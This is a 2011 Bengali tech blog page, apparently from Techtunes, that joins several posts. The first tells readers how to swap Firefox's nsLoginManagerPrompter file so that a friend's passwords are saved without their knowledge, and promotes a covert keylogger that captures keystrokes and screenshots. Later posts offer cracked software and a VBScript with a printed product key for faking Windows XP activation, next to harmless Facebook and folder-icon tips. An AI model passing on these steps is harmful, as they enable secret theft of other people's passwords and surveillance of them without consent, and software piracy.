সোমবার, ২৮ মার্চ, ২০১১

যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার

যে কোন বিষয় থেকে সবারই হ্যাকিং রিলেটেড টিউনের প্রতি বেশি আকর্ষন। হ্যাকার হিসেবে নিজেকে অনেকেই দাবি করে। সবাইযে হ্যাকিং জানেনা তা না অনেকেই জানে। এটা আমাদের জন্য বেশ গর্বের বিষয়। তবে প্রকৃত হ্যাকাররা কখনও নিজের পরিচয় প্রকাশ করতে চায় না। আমার এই টিউনটি আমার ভাল একটা ফ্রেন্ড সায়েমকে উৎসর্গ করছি।
বন্ধুরা প্রায়ই আমার কম্পিউটারে বসে মেইল চেক করে বা ফেসবুক ব্যবহার করে। কেমন হয় যদি আপনার বন্ধুর পাসওয়ার্ড আপনি জেনে জান? icon wink যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes আমরা প্রায় সবাই মজিলা ব্যবহার করি। আপনার বন্ধু যখন মজিলাতে কোন পাসওয়ার্ড দিয়ে লগইন করবে আপনি খুব সহজেই তার পাসওয়ার্ড বের করে ফেলতে পারবেন তার অজান্তেই! আর এজন্য কোন সফটওয়্যারের দরকার নেই। শুধু নিচের ধাপগুলো অনুসরন করলেই পেয়ে যাবেন আপনার কাংখিত পাসওয়ার্ড।

যেভাবে পাসওয়ার্ড হ্যাক করবেনঃ

  1. প্রথমে ডাউনলোড করুন এ ফাইলটি।
  2. যদি এই মুহুর্তে মজিলা চালু থাকে তাহলে তা ক্লোজ করে দিন।
  3. তারপর যান এখানে C:/Program Files/Mozilla Firefox/Components
  4. ঐখান থেকে nsLoginManagerPrompter নামের একটা ফাইল খুজে বের করুন।
1127201061100pm যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes
এখন ডাউনলোড করা ফাইলটি এখানে রিপ্লেস করে দিন। (সতর্কতাস্বরুপ আগের ফাইলটি কপি করে রাখতে পারেন।)
ব্যাস কাজ শেষ!
এখন থেকে মজিলাতে যদি কেউ লগইন করে তাহলে তার অনুমতি ব্যতীত পাসওয়ার্ড সেভ করে রাখবে।

যেভাবে পাসওয়ার্ড দেখবেনঃ

  1. প্রথমে মজিলা ওপেন করুন।
  2. তারপর যান এখানে Tools > Options > Security Tab
  3. তারপর saved passwords এ ক্লিক করুন।
1127201061936pm যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes
এখন show passwords এ ক্লিক করার পর yes দিন।
আর দেখুন সেই গোপন পাসওয়ার্ড।

সেরা একটা কীলগার সফটওয়্যার 007 Spy Software:

  • কীবোর্ডে যা যা টাইপ করেছেন তা দেখতে পারবেন। এমনকি স্ক্রিন কীবোর্ডেরটাও!(ক্যাস্পারস্কি স্ক্রিন কীবোর্ড ছাড়া)
  • কোন কোন ওয়েবসাইট ভিজিট করেছেন জানতে পারবেন।
  • কোন সফটওয়্যার ব্যবহার করলে তার খবরও জানা যাবে।
  • অটোমেটিক ৫-৬০ সেকেন্ড পর পর স্ক্রীন শট তুলতে থাকবে।
  • এছাড়া মেইলের মাধ্যমেও পাসওয়ার্ড হালনাগাদ করা যাবে!
  • আর এসব কিছুই হবে গোপনে! icon wink যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes
ইন্সটল করার পর ctrl+alt+F7 চাপলেই সব দেখতে পারবেন।
1127201064214pm যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes
আর বিস্তারিত বললাম না। তাহলে ঘরে ঘরে পাসওয়ার্ড হ্যাক হবে। icon wink যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes icon razz যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes

ডাউনলোডঃ

007_Spy_Software
সাইজ মাত্র ১ মেগাবাইট। সাথে সিরিয়াল কী দেয়া আছে।

আগের কিছু টিউনঃ

  1. 1000 Hacker Tutorials নিন মাত্র 9MB এ!!!!!!
  2. হ্যাক যেভাবে করতে হয় এবং হ্যাকিং থেকে বাচার উপায়(PDF টিউটোরিয়াল)
আশা করি আপনাদের ভাল লাগবে।

চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি

য় ভাই বন্ধুরা, সবাইকে আস্ সালামুআলাইকুম, আজ আমি কিছুক্ষণ আগে একটি সাহায্য অপশনে দেখলাম কেউ একজন আই পি চেঞ্জ সফট সম্পর্কে জানতে চাইছেন। তাই আমার এই পোস্ট। আই পি চেঞ্জ করার জন্য আমি যে সফটটি ব্যবহার করি তার নাম “প্লাটিনাম হাইড আই পি”, এটি একটি চমৎকার সফটওয়্যার।
images চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি | Techtunes
Platinum IP Hide
সফটওয়্যারের ফুল র্ভাসনটি আমি লিংক দিয়ে দিলাম শুধু ডাউনলোড করলেই হবে। এখানে ক্লিক করে ডাউনলোড করুণ মিডিয়া ফায়ার লিংক এই খানে।  সফটওয়্যরটি প্রথমে ইন্সটল করে নিন এরপর এর সাথে দেওয়া ক্রাক ফাইল পোগ্রাম ফাইলের যেখানে সফটওয়্যারটি ইন্সটল হয়েছে সেখানে গিয়ে রিপ্লেস করে নিন, রিপ্লেস করলেই আপনার সফটওয়্যারটি ফুল র্ভাসন হয়ে যাবে। এবার রান করালে নিচের স্কিনের মত দেখাবে ।
Untitled 1 copy চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি | Techtunes
স্ক্রিন০১
আপনি  সহজেই হাইড আপি বাটনে  ক্লিক করলেই আপনার আই পি হাইড হয়ে যাবে।
001 চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি | Techtunes
০২
এরপর আপনি যদি কোন বিশেষ দেশের আইপি ব্যবহার করতে চান তাহলে choose IP Country থেকে আপনার পছন্দের কান্ট্রি বেছে নিন। অন্য সব আই পি হাইডিং সফটওয়্যারের চাইতে এটি উত্তম বলে আমার কাছে মনে হয়েছে। সাধারণত উন্নত দেশ গুলোর আই পি সিলেক্ট করলে ইন্টারনেটের স্পিড স্লো হয় না।
002 চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি | Techtunes
০৩
এই পোগ্রামটি ব্যাবহার করলে কিছু কিছু রেয়ার সাইট ছাড়া বাকি সব সাইটে আপনার মূল আই পি ধরা পরবে না। এমন কি গুগলে ও আপনার আই পি ধরা পরবে না । গুগলের একটি স্ক্রিন নিচে উপস্থাপন করলাম ।
Document0002 চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি | Techtunes
গুগল
এত ক্ষণ কষ্টকরে এই টিউনটি পড়ার জন্য ধন্যবাদ, আপনাদের কমেন্টসের অপেক্ষায় রইলাম
আইটি  প্রেমী রুহুল ভাইয়ের উদ্দেশ্যে বলছি – ধন্যবাদ ভাই আপনার মুল্যবান কমেন্টস দেওয়ার জন্য। আপনি হয়তো দেখতে ভুল করেছেন আমি ডি ইউ মিটার ব্যবহার করি না। আর ঐ টা পছন্দ ও করি না। আমি ব্যাক্তিগত ভাবে নেট মিটার পছন্দ করি এটা ফ্রিওয়্যার তাই ঝামেলাহীন। এই খানে ডাউনলোড লিংক দিয়ে দিলাম সবার কাজে  আসতে পারে। http://www.softpedia.com/dyn-postdownload.php?p=23932&t=3&i=1
সবার আহবানে আমি মিডিয়া ফায়ার লিংক দিয়ে দিলাম আশা এখন আর সমস্যা হবে ।  http://www.mediafire.com/?m0fla9p1ingbue4

লুকিয়ে লুকিয়ে দিন ফেসবুক status

আসসালামুআলাইকুম। আশা করি সবাই ভালো আছেন। নিশ্চয় এতক্ষণে বুঝে ফেলেছেন টিউনটি ফেসবুক বিষয়ক। দেরি না করে মূল কথায় আসি।
আমরা যারা ফেসবুক ব্যবহার করি তারা অনেকেই এই সমস্যার মুখোমুখি হই। সমস্যাটা হল কেউ মন খুলে শান্তিমত স্ট্যাটাস দিতে পারি না। কারণ ফ্রেন্ড লিস্টে থাকা কিছু ফ্রেন্ড। আমিও আগে এই জন্য status দিতে পারতাম না। ফ্রেন্ড লিস্টে এমন কিছু মুরুব্বি  টাইপের ফ্রেন্ড থাকে যাদের জন্য ইচ্ছামত স্ট্যাটাসও দেয়া যায় না আবার তাদেরকে রিমুভও করা যায় না।আসুন, সমস্যাটার সমাধান করি।
প্রথমে হোম পেজ অথবা প্রোফাইল পেজের যে জায়গায় স্ট্যাটাস দেন সে জায়গায় আসুন। তারপর নিচের র্নিদেশিত লক চিহ্নটিতে ক্লিক করুন।
hidefacebookstatus thumb লুকিয়ে লুকিয়ে দিন ফেসবুক status | Techtunes
তারপর  customize এ যান।
facebookstatushide thumb1 লুকিয়ে লুকিয়ে দিন ফেসবুক status | Techtunes
customize ক্লিক করলে custom privacy নামে  যে পেজ আসবে তাতে  প্রথমে লেখা থাকবে make this visible to these people:
সেখানে কয়েকটি অপশন পাবেন। তার মধ্যে specific people সিলেক্ট করে যাদের নাম সিলেক্ট করবেন শুধু তারাই দেখতে পাবে আপনার status.
customprivacyfacebook thumb লুকিয়ে লুকিয়ে দিন ফেসবুক status | Techtunes
আবার তার নিচে দেখতে পাবেন Hide this from. সেখানে যাদের নাম সিলেক্ট করবেন তারা বঞ্চিত হবে আপনার স্ট্যাটাস থেকে। আপনার setting  টি স্থায়ীভাবে রাখতে চাইলে ক্লিক করুন Make this my default setting অপশনটিতে।
এভাবে আপনার ইচ্ছামত privacy দিয়ে status setting পরিবর্তন করতে পারবেন।

আন লক করুন যে কোন ফেক ফোল্ডর লকড-ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার

ধন্যবাদ আপনাকে, আমার আজকের এই টিউনটি আপনারই জন্য। আমাদের কম্পিউটারে কাজের নানান ধরনের উপকরণ থাকে যা  সবার সাথে শেয়ার না করতে চাওটাই স্বাভাবিক। আমাদের মধ্যে অনেকেই রয়েছেন যারা ফেক ফোল্ডারের মত সফট ব্যবহার করে ফোল্ডার লক করে থাকি  কিন্তু ফেক ফোল্ডার সাধারণত একটি বিশেষ কোড ব্যবহার করে ফোল্ডারে ডেস্টিনেশন ফরওর্য়াড করে দেয় এবং ওপেন করলেই তা কন্ট্রোল ফ্যানেলে চলে য়ায়। এই  বিশেষ কোড টি ফোল্ডারের নামের শেষে জুড়ে দেয় আপনি যদি এই কোড টি রিমুভ করেন তাহলেই আপনার ফোল্ডারটি আন লক হয়ে ডাবে।
Untitled 1 copy আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
একটি লকড ফোল্ডারের নমুনা
আর আপনি ফেক ফোল্ডার সফট ছাড়াই যদি এই কোড টি কোন ফোল্ডারের নামের শেষে যুক্ত করে দেন তাহলে তা লকড হয়ে যাবে। এবার বলুন আপনি কি আর ফেক ফোল্ডার ব্যবহার করবেন?
002 আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
মতামত
আপনি যে কোন, যে কোন ফোল্ডারের নামের শেষে সহজেই শুধু .{21EC2020-3AEA-1069-A2DD-08002B30309D} কোড টি পেস্ট করে দিন, খেয়াল রাখবেন সাথে কিন্তু একটি  “.”  আছে ঐ টি সহ দিবেন।
যাই হোক এবার মুল প্রসংগে ফিরে আসি, আমি যে সফট টি ফোল্ডার লক করার জন্য ব্যবহার করি সেটি শুধু ফোল্ডার লক ই করে না সাথে সাথে ফোল্ডারকে সর্ম্পূণ রূপে হাইড করে দেয়। এতে আপনি কারও কাছ থেকে কিছু হাইড করলে সে সেটা টের ও পাবে না। এ কাজ টি করার জন্য আপনাকে ইউনির্ভাসাল সিলড নামক একটি সফটওয়্যার ব্যবহার করতে হবে।
images আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
পছন্দের সফটওয়্যার
পছন্দের সফটওয়্যারটি আমি মিডয়া ফয়ার এবং ৪সেয়ার এ আপলোড করে দিব যাতে সবার ডাউনলোড করতে সুবিধা হয়।
মিডিয়া ফায়ার লিংক
৪শেয়ার লিংক
এবার কাজের কথায় আসি ,  পছন্দের সফটওয়্যারটির সাথে আমি এর ক্রাকটি ও দিয়ে দিলাম।  সফটওয়্যারটির ইন্সটল করার সময় আপনার কাছে পাসওর্য়াড চাইবে, আপনি আপনার মনের মত পাসওর্য়াডটি দিন ইন্সটল শেষে রির্স্টট চাইবে , রির্স্টাটের পর ক্রাক ফাইলটি কপি করুন, এবার র্স্টাট মেনু থেকে বা ডেক্সটপ থেকে সফটওয়্যারটির আইকনের উপর রাইট ক্লিক করে ফাইন্ড র্টাগেট এ ক্লিক করুন। এবার সফটটি যেখানে ইন্সটল হয়েছে সে ফোল্ডরটি ওপেন হবে এখানে আপনি আগে থেকে কপি করা ক্রাকটি পেস্ট করে দিন, ব্যাস হয়ে গেল ফুল ভার্সন।
এবার রান করুন, রান করলে নিচের স্ক্রিনের মত দেখাবে। আপনার কাছে পাসওর্য়াড চাইবে। পাসওর্য়াড দিন ।
universal shild আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
universal shild
পাসওর্য়াড দেওয়ার পর নিচের স্ক্রিনের মত পোগ্রামটি রান হবে।
05 আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
প্রথম স্ক্রিন
এখন আপনি প্রোটেকশন বাটনে ক্লিক করে কোন ফোল্ডার, ফাইল এমন কি ডাইভ কে ও আপনি যুক্ত করতে পারেণ।
06 আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
কাস্টোমাইজ
এর পর আপনি ড্রাইভ, ফোল্ডার, ফাইল এড করার পর ডান পাশের লক বাটনে ক্লি করলেই লক হয়ে যাবে, এখান থেকে আপনি লক , আনলক করতে পারবেন।
07 আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
কাস্টোমাইজ
এই পোগ্রামটি সর্টকাট কি ব্যবহার এর সুবিধা ও রয়েছে, আপনি চাইলে এক ক্লিকেই সব লক এবং আনলক করতে পারবেন তবে পাসওর্য়াড ছাড়া না।
08 আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
কাস্টমাইজ সর্টকাট কি
যে কাজের সর্টকাট কি ব্যবহার করতে চান সেখানে মাউস রেখে কি বোর্ডের কি প্রেস করলেই কি একটিভ হয়ে যাবে।
ধন্যবাদ এতক্ষনধরে টিউনটি পড়ার জন্য, আপনার সমান্যতম কাজে আসলেই আমার এই টিউনটি সার্থক হবে। যে কোন ধরনের কমেন্টস স্বাদরে গ্রহন করব, আর অবশ্যই অবশ্যই অনেক বেশী কমেন্টস আশা করি।

আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে।

ভাল আছেন তো সবাই।
আজকে আপনাদের আমি একটি মজার টিপস্ দেবো।
হয়তো বা অনেকের জানা, তবুও যাদের জানা নেই তাদের কাছে ভালো লাগবে।
আপনাদের প্রথমে Customize Folder Software টি ডাউনলোড করতে হবে। হয়তো বা ভাবছেন Software টা জানিইনা প্রথমেই ডাউনলোড করতে বলছে।
এবার আপনাদের Customize Folder Software টি নিয়ে বলছি।
এই সফটওয়ার দিয়ে আপনার ডাইভ/ফোল্ডার এ ছবি সেট করতে পারবেন, টেক্স কালার করতে পারবেন, আয়কন চেন্জ করতে পারবেন।
ডাউন লোড এর জন্য লিংক দেওয়া হল।
Customize Folder
Only 1.13 MB
Customize Folder.rar নামিয়ে নিন, এরপর Winrar সফটওয়ার দিয়ে Extract করে নিন।
01 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
Extract হয়ে গেলে
Customize Folder টি ওপেন করুন,  Setup.exe তে ডাবল কিল্ক করুন, এবং
Setup Complete করুন|
02 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunesএবার My Conputer এ যান  এবং যে কোন ডাইভে Properties এ যান।
03 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
লক্ষ করুন Customize নামে একটি টেব হয়েছে।
04 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
এবার ছবি সেট করার পালা, Customize টেবে গিয়ে Browse… বাটনে কিল্ক করুন।
05 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
আপনার যে কোন ডাইভ থেকে ছবি ওপেন করুন।
06 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
Preview তে ছবি দেখা গেলে OK বাটনে কিল্ক করুন।
07 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
এবার My Computer Close করে আবার রানিং করুন।
আপনার যে ডাইভে ছবিটি সেট করেছেন সেই ডাইভ টি ওপেন করুন দেখবেন আপনার ছবিটি সেট হয়ে গেছে।
টিপস্টা ভাল লাগলে কমেন্টস করবেন।

১ মিনিটে ১টি ক্লিক করে Windows XP জেনুইন করুন সাথে জেনুইন চেক করা সোফটওয়্যার(কোডিং দিয়ে দিলাম, নিজেও বানিয়ে নিতে পারেন)

আমি জানি এটা নিয়ে অনেক টিউন হয়েছে আগে, তবে একবার দেখে বলুন তো এত ইজি ভাবে জেনুইন করার ট্রিক্স কি আগে দেখেছেন? হতে পারে দেখেছেন পুরানো ব্লগার রা নতুন দের উপকার হবে তাই দিলাম। জেনুইন জিনিস ইউস করার মজাই আলাদা তাই না? এনিওয়েস প্যাচাল অফ করলাম। সবাই ভালো থাকুন।

টিউন কনফিগারেশন:-

|———————————————|
| ইউসার লেভেল – বিগিনার লেভেল
| ডিফিকাল্টি – ১০%
| এখান থেকে ডাউনলোড করুন (2mb)
|———————————————|

দেখুন কিভাবে কাজ করতে হবে

জেনুইন করুন এভাবে

ডাউনলোড করার পর আনজিপ করে নিলে ফোলডারে ৪টা ফাইল পাবেন নিচের ছবির মত। Run.bat নামের ফাইলে ডাবল ক্লিক করুন আপনার এক্সপি জেনুইন হয়ে যাবে। হিহি। (সার্ভিস প্যাক ২ তে আমি ইউস করেছি।)
0003 ১ মিনিটে ১টি ক্লিক করে Windows XP জেনুইন করুন সাথে জেনুইন চেক করা সোফটওয়্যার(কোডিং দিয়ে দিলাম, নিজেও বানিয়ে নিতে পারেন) | Techtunes

জেনুইন চেক করুন এভাবে

১। এখন চেক করার জন্য MGADiag.exe এই নামের ফাইল টা ওপেন করুন
chekc ১ মিনিটে ১টি ক্লিক করে Windows XP জেনুইন করুন সাথে জেনুইন চেক করা সোফটওয়্যার(কোডিং দিয়ে দিলাম, নিজেও বানিয়ে নিতে পারেন) | Techtunes
২। এখন নিচের ছবিতে মার্ক করা আছে যেখানে মানে continue লিখায় ক্লিক করুন
0001 ১ মিনিটে ১টি ক্লিক করে Windows XP জেনুইন করুন সাথে জেনুইন চেক করা সোফটওয়্যার(কোডিং দিয়ে দিলাম, নিজেও বানিয়ে নিতে পারেন) | Techtunes
৩। আপনার ইনডোস জেনুইন হলো কিনা সেটা দেখুন, নিচের ছবিতে মার্ক করা আছে। জেনুইন না হলে লিখা আসবে ইনভেলিড সিরিয়াল কি। জেনুইন থাকলে লিখা থাকবে সবুজ কালারে “জেনুইন”
00021 ১ মিনিটে ১টি ক্লিক করে Windows XP জেনুইন করুন সাথে জেনুইন চেক করা সোফটওয়্যার(কোডিং দিয়ে দিলাম, নিজেও বানিয়ে নিতে পারেন) | Techtunes

সিরিয়াল কি চেন্জ করুন এভাবে

১। Run.bat নামের ফাইলে রাইট ক্লিক করে ইডিটে ক্লিক করুন ওখানে যেই নাম্বারটা আছে সেটা বদল করে নিউ নাম্বার দিয়ে দিন তার পর সেভ করে Run.bat ফাইলটি আবার ডাবল ক্লিক করুন, হয়ে যাবে।চেক করতে চাইলে আগের মত চেক করে নিন।
আমি আপনাদের ১০০টি জেনুইন সিরিয়াল দিয়ে দিলাম। সার্ভিস প্যাক ২ এর জন্য। কয়েকটা কাজ না করলে পরের গুলো ট্রাই করুন।

নিজে যদি এই কোড বানাতে চান তাহলে এভাবে

১। নোটপেড ওপেন করে নিচের কোড গুলো ChangeKeyXP.vbs নামে সেভ করুন।
ON ERROR RESUME NEXT

if Wscript.arguments.count<1 then
Wscript.echo "Script can't run without VolumeProductKey argument"
Wscript.echo "Correct usage: Cscript ChangeKeyXP.vbs ABCDE-FGHIJ-KLMNO-PRSTU-WYQZX"
Wscript.quit
end if

Dim VOL_PROD_KEY
VOL_PROD_KEY = Wscript.arguments.Item(0)
VOL_PROD_KEY = Replace(VOL_PROD_KEY,"-","") 'remove hyphens if any

for each Obj in GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf ("win32_WindowsProductActivation")

result = Obj.SetProductKey (VOL_PROD_KEY)

if err <> 0 then
WScript.Echo Err.Description, "0x" & Hex(Err.Number)
Err.Clear
end if

Next
২। এখন নিচের কোড গুলো নতুন একটা নোটপেড অপেন করে Run.bat নামে সেভ করুন
Cscript ChangeKeyXP.vbs BKQW7-3JYTB-D26TX-DHPDM-3MTKG
৩। জেনুইন করতে চাইলে run.bat নামের ফাইলে ডাবল ক্লিক করুন। জেনুইন চেক করতে ও সিরিয়াল কি চেন্জ করুন আগের মত করে।
সবাইকে আনেক ধন্যবাদ, সবাই ভালো থাকুন

ফেসবুকের ভিন্নভাষী বন্ধুর ভাষা অনুবাদ করুন সহজেই

সবাই কেমন আছেন ? অনেকদিন পর টিউন করছি।টেকটিউনে আমার লগইন করার পাসওয়ার্ডই ভুলে গিয়েছিলাম।পাসওয়ার্ড ইমেইল দিয়েও কাজ হচ্ছিলো না।আমি যে ইমেইল দিয়ে টেকটিউন ব্যবহার করি সেটিও ভুল দেখানো হচ্ছে।জানি না কেন এরকম হলো।আর আমি এমন কোন টিউন করেছি বলে মনে হয় না যার জন্য টেকটিউন থেকে আমাকে ব্যান করবে।ভালো মন্দ কিছু সংখ্যক টিউন করেছি আগে,এখন সেই টিউনগুলোর সাথে  আর টিউন যোগ করতে পারবো না এটা মেনে নিতে পারছিলাম না।এভাবে প্রায়ই লগইন ব্যর্থ চেষ্টা করেছি।আজ কিভাবে যেন অবশেষে ঢুকে পড়লাম।আপাতত সামান্য একটা টিউন দিয়ে আমার পুর্নযাত্রা শুরু করি।
সামাজিক যোগাযোগের জনপ্রিয় সাইট ফেসবুকের সাহায্যে আমরা অনেক সময় ভিন্ন ভাষী মানষের সাথে বন্ধুত্ব করি।কিন্তু অনেক সময় ভিনদেশী বন্ধুরা ফেসবুকে তাদের মাতুভাষা ব্যবহার করে।যার ফলে আমরা তাদের প্রোফাইল তথ্য,স্ট্যাটাস ইত্যাদি লেখা বুঝতে পারি না।জনপ্রিয় ব্রাউজার মজিলা ফায়ারফক্স ব্যবহার করে ইচ্ছে করলে আপনি যে কোন ভাষার লেখা অনুবাদ করে নিতে পারেন।এজন্য আপনার লাগবে Facebook Translate নামের একটি এ্যাডঅন।এ্যাডঅনটি  http://addons.mozilla.org/en-US/firefox/addon/159637/
ঠিকানা থেকে নামিয়ে নিন।
এরপর ফায়ারফক্স রির্স্টাট দিন ।এখন ফেসবুকে লগইন করুন।খেয়াল করুন ফেসবুকে সকল স্ট্যাটাস,ওয়াল,ম্যাসেজ ইত্যাদির সাথে translate নামে একটি অপশন এসেছে।এই অপশনে ক্লীক করলে ভিন্ন ভাষার যেকোন লেখা   ইংরেজীতে অনুবাদ হয়ে যাবে।
টিউনটি ভালো লাগলে/খারাপ লাগলে কমেন্ট করবেন।আর টিউনটি আগে হয়ে থাকলে আমার বলার কিছু নাই।